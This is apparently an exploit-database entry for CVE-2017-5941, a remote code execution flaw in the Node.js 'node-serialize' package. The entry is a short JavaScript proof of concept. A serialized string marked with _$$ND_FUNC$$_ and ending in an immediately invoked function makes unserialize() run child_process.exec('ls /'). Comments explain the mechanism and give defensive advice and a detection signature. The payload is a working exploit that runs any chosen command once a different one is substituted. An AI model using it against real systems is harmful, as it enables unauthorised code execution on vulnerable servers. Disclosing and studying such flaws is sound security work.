Node.JS - 'node-serialize' Remote Code Execution



EKU-ID: 49180 CVE: CVE-2017-5941 OSVDB-ID:
Author: OpSecX Published: 2017-02-08 Verified: Not Verified


// Proof of concept for CVE-2017-5941 in the 'node-serialize' package.
//
// unserialize() treats any string value that starts with the marker
// _$$ND_FUNC$$_ as JavaScript source and evaluates it to rebuild a function.
// The trailing "()" in the value below makes that source an immediately
// invoked function expression, so the body runs during deserialization
// itself, before any caller touches the resulting object.
//
// The body here only lists "/" and prints the output, which is enough to
// show that code supplied inside the serialized data was executed.
//
// Defensive notes:
//   - Data that crosses a trust boundary must not reach unserialize();
//     JSON.parse plus schema validation handles plain data without
//     evaluating anything.
//   - The literal marker "_$$ND_FUNC$$_" in inbound request data or logs is
//     a practical detection signature for attempts against this bug.
const nodeSerialize = require('node-serialize');

// Serialized object whose single property carries the function marker.
const serializedInput = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';

// Deserializing is the trigger: the embedded function is evaluated and called here.
nodeSerialize.unserialize(serializedInput);